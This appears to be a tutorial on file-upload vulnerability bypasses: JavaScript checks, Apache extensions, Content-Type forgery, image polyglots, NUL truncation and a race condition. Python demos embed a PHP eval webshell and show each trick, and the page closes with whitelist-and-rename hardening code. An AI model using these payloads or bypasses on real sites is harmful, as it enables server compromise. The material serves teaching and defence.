2025-02-24 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/01 Report--
Introduction
File upload is a standard feature of modern web sites: users upload pictures, videos and other kinds of files. If the upload handling is vulnerable, a malicious user can upload an executable script to the web server, obtain the privileges of the web application, and use that foothold to attack the server itself.
An upload vulnerability arises when the server does not strictly validate and filter what the client sends, so that arbitrary files, including script files (php, jsp, asp, aspx and so on), can be uploaded.
With an uploaded webshell a malicious user can control the whole site, and often the server it runs on.
Bypass
JavaScript detection bypass
Client-side JavaScript checks are common on upload forms. If the suffix is not allowed, a pop-up tells you so and nothing is sent to the server: the check ran only in the browser, so the request never reached the server at all.
There are two ways to bypass this:
1. Use a browser plug-in (or the browser's developer tools) to delete the JavaScript code that checks the file suffix, then upload the file.
2. Rename the file to an allowed suffix so that the JavaScript check passes, capture the request with a proxy, and change the filename back to the original suffix before it reaches the server.
Either way the file is uploaded successfully: the JavaScript check has been bypassed.
File suffix bypass
File suffix bypass means that although the server refuses certain suffixes, Apache can be configured to execute files with other suffixes as well. For example, the following line in the Apache configuration file httpd.conf makes Apache treat both .php and .phtml files as PHP:
AddType application/x-httpd-php .php .phtml
Apache evaluates multiple extensions from right to left: if the rightmost extension is unknown, it moves left until it finds one it recognises. So for an uploaded file named luguo.php.xxx, the suffix xxx is not recognised and Apache falls back to .php, executing the file as PHP. (With AddHandler rather than AddType, a .php anywhere in the name can be enough, because a handler bound to one extension is not overridden by a known MIME type to its right.)
File type bypass
This bypass needs only two quick observations.
Capture the request with Burp Suite.
When uploading a php file, the Content-Type of the file part in the packet is application/x-php.
When uploading a jpg file, the Content-Type of the file part is image/jpeg.
From this one can infer that the server determines the file type from the Content-Type value. Because that value is supplied by the client, it can be changed at will: when uploading a php file, simply rewrite Content-Type to image/jpeg in Burp Suite and the check is bypassed.
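The two request-tampering bypasses above (changing the filename back after the JavaScript check, and rewriting the part Content-Type) come down to the same thing: the server trusts fields the client controls. The following Python script is an added example written for this page, not code from the original article. It builds the multipart body a browser would send, parses it the way a naive server would, and shows a type check that only reads Content-Type accepting a .php file once that header says image/jpeg. The field name upload_file, the sample webshell and the server-side check are constructed for the demo.

```python
import re
import secrets

# Constructed sample payload for the demo (not from the original article).
WEBSHELL = b"<?php @eval($_POST['cmd']); ?>"


def build_multipart(field, filename, content_type, data):
    """Build a multipart/form-data body the way a browser builds it for
    <input type="file">.  Returns (Content-Type request header, body bytes).
    The filename and the part Content-Type are exactly the fields Burp lets
    you rewrite after the browser-side JavaScript check has already passed."""
    boundary = "----WebKitFormBoundary" + secrets.token_hex(8)
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n"
        "\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return f"multipart/form-data; boundary={boundary}", head + data + tail


def parse_file_part(request_content_type, body):
    """Minimal server-side parser: returns the first file part as a dict with
    filename, content_type and data.  Enough for the demo, not a full RFC 7578 parser."""
    boundary = request_content_type.split("boundary=", 1)[1].encode()
    for part in body.split(b"--" + boundary):
        if b"\r\n\r\n" not in part:
            continue
        headers, _, payload = part.partition(b"\r\n\r\n")
        fn = re.search(rb'filename="([^"]*)"', headers)
        if fn is None:
            continue
        ct = re.search(rb"Content-Type:\s*([^\r\n]+)", headers, re.I)
        if payload.endswith(b"\r\n"):      # CRLF that precedes the next boundary
            payload = payload[:-2]
        return {
            "filename": fn.group(1).decode(),
            "content_type": ct.group(1).decode().strip() if ct else "",
            "data": payload,
        }
    return None


def vulnerable_type_check(part):
    """The server logic inferred in the text: accept if the *client-supplied*
    part Content-Type claims the upload is an image."""
    return part["content_type"] in ("image/jpeg", "image/png", "image/gif")


def demo():
    """Returns (honest_upload_accepted, forged_upload_accepted, forged_part)."""
    # 1. Honest upload: the browser labels luguo.php as application/x-php -> rejected.
    ct, body = build_multipart("upload_file", "luguo.php", "application/x-php", WEBSHELL)
    honest = vulnerable_type_check(parse_file_part(ct, body))
    # 2. Same bytes, same .php filename, only the part Content-Type rewritten to
    #    image/jpeg (the one edit you make in Burp) -> accepted.
    ct, body = build_multipart("upload_file", "luguo.php", "image/jpeg", WEBSHELL)
    forged = parse_file_part(ct, body)
    return honest, vulnerable_type_check(forged), forged
```

The stored file in the second case still has the .php name and the PHP bytes; only the label changed, which is why a server that decides on Content-Type alone has decided on nothing.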
There is a related upload weakness in PHP. Code that calls getimagesize() to obtain the width and height of the picture refuses the upload when getimagesize() cannot read image information from the file. But the picture and the webshell can be merged into a single file with the command below:
cat index.png luguo.php > snowwolf.php
Upload snowwolf.php: getimagesize() reads the valid PNG header at the start of the file and accepts it, and the PHP code appended after the image runs when the uploaded path is requested.
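The polyglot produced by that cat command works because getimagesize() only inspects the image header at the start of the file. The Python below is an added example, not code from the article: it builds a minimal valid PNG from scratch, appends a PHP payload exactly as the cat command does, and runs a header-only size check in the spirit of getimagesize() against it. The size check is a simplification written for the demo and the sample webshell is constructed.

```python
import struct
import zlib

# Constructed sample webshell for the demo (not from the article).
WEBSHELL = b"<?php @eval($_POST['cmd']); ?>"


def png_chunk(tag, payload):
    """Length + type + data + CRC32 over type and data, as the PNG spec requires."""
    crc = zlib.crc32(tag + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + tag + payload + struct.pack(">I", crc)


def minimal_png(width=1, height=1):
    """A small, valid 8-bit RGB PNG filled with red; stands in for index.png."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    scanlines = b"".join(b"\x00" + b"\xff\x00\x00" * width for _ in range(height))
    return (
        b"\x89PNG\r\n\x1a\n"
        + png_chunk(b"IHDR", ihdr)
        + png_chunk(b"IDAT", zlib.compress(scanlines))
        + png_chunk(b"IEND", b"")
    )


def image_size(data):
    """Header-only check in the spirit of PHP getimagesize() for PNG: returns
    (width, height) if the file starts with a PNG signature and an IHDR chunk,
    else None.  Simplified for the demo; it never looks past the header,
    which is exactly why trailing PHP goes unnoticed."""
    if data[:8] != b"\x89PNG\r\n\x1a\n" or data[12:16] != b"IHDR":
        return None
    return struct.unpack(">II", data[16:24])


def make_polyglot(image, webshell):
    """Byte for byte what `cat index.png luguo.php > snowwolf.php` produces."""
    return image + webshell


def demo():
    poly = make_polyglot(minimal_png(2, 3), WEBSHELL)
    return {
        "plain_php": image_size(WEBSHELL),                       # None: rejected
        "polyglot": image_size(poly),                             # (2, 3): accepted
        "wrong_order": image_size(WEBSHELL + minimal_png(2, 3)),  # None: shell first breaks the signature
        "payload_intact": WEBSHELL in poly,                       # True
    }
```

The order of the cat arguments matters: the image must come first so that the PNG signature sits at offset 0; PHP itself does not care what precedes the `<?php` tag.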
File truncation bypass
In the C strings that PHP's filesystem functions use, byte 0x00 is the string terminator, so everything after it is dropped.
Conditions: PHP version lower than 5.3.4, and magic_quotes_gpc off (otherwise the NUL byte would be escaped).
When a file is uploaded, the server takes the content of the GET parameter name as the first part of the stored filename and appends an image name generated from the current time as the second part.
Change the parameter to luguo.php followed by a NUL byte (luguo.php%00 in the URL, or insert 0x00 in Burp's hex view). When the server saves the file, the time-generated image name and the .jpg after the NUL are cut off, leaving only luguo.php, so the webshell is uploaded successfully.
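To see what the NUL byte does to the path, here is an added Python example (not from the article) that rebuilds the filename the way the server logic above does, then shows the path as a C string consumer sees it versus how a modern runtime treats it. The upload directory name, the time format and the helper names are assumptions made for the demo.

```python
import ctypes
import time


def vulnerable_save_name(name_param, upload_dir="upload"):
    """Server logic described above: the GET parameter `name` is the first part
    of the stored filename and a time-based image name ending in .jpg is
    appended.  Returns the string PHP builds, NUL byte still inside.
    (Directory name and time format are assumptions for the demo.)"""
    generated = time.strftime("%Y%m%d%H%M%S") + ".jpg"
    return f"{upload_dir}/{name_param}{generated}"


def as_seen_by_c(path):
    """What the underlying C filesystem call (fopen/rename behind
    move_uploaded_file in PHP < 5.3.4) receives: the bytes up to the first NUL.
    ctypes.c_char_p has the same terminator semantics, so no libc call is needed."""
    return ctypes.c_char_p(path.encode()).value.decode()


def modern_runtime_rejects(path):
    """Current runtimes refuse embedded NULs instead of truncating: Python's
    open() raises ValueError, and PHP >= 5.3.4 likewise rejects the path."""
    if "\x00" not in path:
        raise ValueError("demo helper: only call with a NUL-containing path")
    try:
        open(path, "wb")
    except ValueError:
        return True
    return False


def demo():
    """Returns (string PHP builds, path the C layer sees, modern runtime rejects?)."""
    # %00 in the query string is URL-decoded to a raw NUL before the name is built.
    built = vulnerable_save_name("luguo.php\x00")
    return built, as_seen_by_c(built), modern_runtime_rejects(built)
```

The first return value still ends in .jpg and would pass a suffix check done on the PHP string; the second is the name that actually lands on disk under the vulnerable PHP version.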
Competitive conditions bypass
Some sites first allow any file to be uploaded, then check whether it contains a webshell and delete it if so. The vulnerability is the time gap between the file being written and the deletion: a malicious user can exploit that window, a classic race condition.
The attacker first uploads a webshell script, snowwolf.php, which when executed writes a new webshell script, as follows:
As soon as snowwolf.php has been uploaded, the attacker immediately requests it; a shell.php file is generated on the server before the check deletes snowwolf.php, and the attack is complete.
The shell.php file has been generated.
PS: fast clicking finally pays off.
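An offline simulation of that race, added here as an example and not part of the article: the server side saves the file, spends a short time scanning it and then deletes it, while an attacker thread polls for the path and copies its contents the moment it appears (standing in for the HTTP request that would execute the dropper). The scan delay, the temporary directory and the dropper payload are constructed for the demo; in the real attack the window is whatever the scanner's latency happens to be.

```python
import os
import tempfile
import threading
import time

SCAN_DELAY = 0.05  # constructed: seconds the simulated webshell scan takes
# Constructed dropper payload: a PHP one-liner that would write shell.php.
# It is treated as data only; nothing in this script executes PHP.
DROPPER = b"<?php file_put_contents('shell.php', '<?php @eval($_POST[\"a\"]); ?>'); ?>"


def vulnerable_upload(upload_dir, filename, data):
    """Server logic from the text: write the file first, scan it afterwards,
    delete it if it looks like a webshell.  Returns True if the file was kept."""
    path = os.path.join(upload_dir, filename)
    with open(path, "wb") as f:
        f.write(data)
    time.sleep(SCAN_DELAY)          # the window the attacker races against
    if b"<?php" in data:
        os.remove(path)
        return False
    return True


def attacker(path, persist_path, result, timeout=2.0):
    """Poll until the uploaded path exists and is non-empty, then copy its bytes
    to persist_path.  In the real attack this is the request to snowwolf.php,
    whose execution writes shell.php; the copy stands in for that side effect."""
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        try:
            with open(path, "rb") as f:
                data = f.read()
        except FileNotFoundError:
            time.sleep(0.001)
            continue
        if not data:                # opened between create and close; retry
            continue
        with open(persist_path, "wb") as f:
            f.write(data)
        result["hit"] = True
        return
    result["hit"] = False


def run_race():
    """Returns (kept_by_server, attacker_hit, shell_php_exists, snowwolf_php_exists)."""
    with tempfile.TemporaryDirectory() as d:
        uploaded = os.path.join(d, "snowwolf.php")
        dropped = os.path.join(d, "shell.php")
        result = {}
        t = threading.Thread(target=attacker, args=(uploaded, dropped, result))
        t.start()
        kept = vulnerable_upload(d, "snowwolf.php", DROPPER)
        t.join()
        return kept, result["hit"], os.path.exists(dropped), os.path.exists(uploaded)


if __name__ == "__main__":
    print(run_race())   # (False, True, True, False): snowwolf.php deleted, shell.php survived
```

The scanner did its job and deleted snowwolf.php, yet shell.php remains: scanning after the file is reachable can never close this window, only validating before the write can.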
Repair suggestions
Validate the file suffix against a whitelist of allowed extensions.
Rename uploaded files to server-generated names (and store them where the web server will not execute scripts).
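The two repair suggestions in hardened form, as an added Python example rather than code from the article: a whitelist of extensions paired with the magic bytes each must start with, rejection of NUL bytes and path separators in the name, and a random server-generated filename. The allowlist table, the exception type and the stub PNG used in the demo are assumptions for this example. Note what it does and does not stop: luguo.php, luguo.php.xxx and luguo.php%00.jpg are all rejected, but a PNG with PHP appended (the cat trick above) still matches the PNG magic, so it is the rename plus storing outside any script-executing path that actually prevents such a polyglot from running.

```python
import os
import secrets
import tempfile

# Constructed allowlist for this example: extension -> magic prefixes the
# content must start with.  Extend for whatever the site really needs.
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


class UploadRejected(Exception):
    """Hypothetical exception type for this example; raised when validation fails."""


def validate(filename, data):
    """Whitelist check: reject NULs and path separators outright, take only the
    last suffix, require it to be in ALLOWED, and require the content to start
    with one of that type's magic prefixes.  Returns the normalised extension."""
    if "\x00" in filename or "/" in filename or "\\" in filename:
        raise UploadRejected("illegal characters in filename")
    _, dot, ext = filename.rpartition(".")
    ext = ext.lower()
    if not dot or ext not in ALLOWED:
        raise UploadRejected(f"suffix {ext!r} is not whitelisted")
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        raise UploadRejected("content does not match declared type")
    return ext


def store(upload_dir, filename, data):
    """Rename: the client's name is discarded and a random server-generated
    name with the validated extension is used, so multi-extension and
    truncation tricks never reach the filesystem.  Returns the stored name."""
    ext = validate(filename, data)
    stored = f"{secrets.token_hex(16)}.{ext}"
    with open(os.path.join(upload_dir, stored), "wb") as f:
        f.write(data)
    return stored


def demo():
    """Runs the handler against the attack names from this article and
    returns {original name: outcome}."""
    shell = b"<?php @eval($_POST['cmd']); ?>"                  # constructed
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16                 # constructed stub: signature only
    cases = [
        ("luguo.php", shell),
        ("luguo.jpg", shell),            # whitelisted suffix, wrong content
        ("luguo.php\x00.jpg", png),      # NUL truncation attempt
        ("luguo.php.xxx", png),          # Apache multi-extension attempt
        ("avatar.png", png),             # honest upload
    ]
    outcome = {}
    with tempfile.TemporaryDirectory() as d:
        for name, data in cases:
            try:
                stored = store(d, name, data)
                outcome[name] = ("stored", stored.endswith(".png"), stored != name)
            except UploadRejected as e:
                outcome[name] = ("rejected", str(e))
    return outcome
```

Serve the upload directory with script execution disabled (for Apache, `php_flag engine off` or `SetHandler` to a plain type in that directory) and, for images, consider re-encoding through an image library so that appended payloads are discarded rather than copied.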
Demo source of the file upload vulnerability pages: https://pan.baidu.com/s/1V5b7_FvQjd4yKdaoDbBXCw
Extraction code: 5i89